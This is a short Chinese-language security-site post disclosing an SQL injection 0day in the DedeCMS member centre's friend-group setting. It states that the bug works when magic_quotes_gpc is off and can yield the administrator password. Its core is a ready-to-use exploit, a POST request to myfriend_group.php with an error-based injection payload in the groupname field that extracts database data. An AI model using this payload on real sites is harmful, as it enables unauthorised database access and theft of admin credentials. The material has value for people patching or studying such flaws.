频道栏目
首页 > 安全 > 网站安全 > 正文

DedeCMS会员中心好友分组设置SQL注射0day漏洞

2012-12-30 11:56:10         来源:0x50sec.org   作者:c4rp3nt3r
收藏   我要投稿
需要magic_quotes_gpc = Off

 

DedeCMS会员中心好友分组设置SQL注射0day漏洞,成功利用该漏洞可获得管理员密码

都发出来吧,这种东西也算什么漏洞阿.其实对dedecms来说POST的数据同样可以GET提交,只是隐蔽点.

 

利用代码如下:

 

Exploit:

 

http://www.2cto.com /de/member/myfriend_group.php?dopost=add

POST

groupname=fffrrr'and @`'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b) and '

 

上一篇:DedeCMS会员中心短消息SQL注射0day漏洞
下一篇:DedeCMS会员中心空间管理SQL注射0day漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站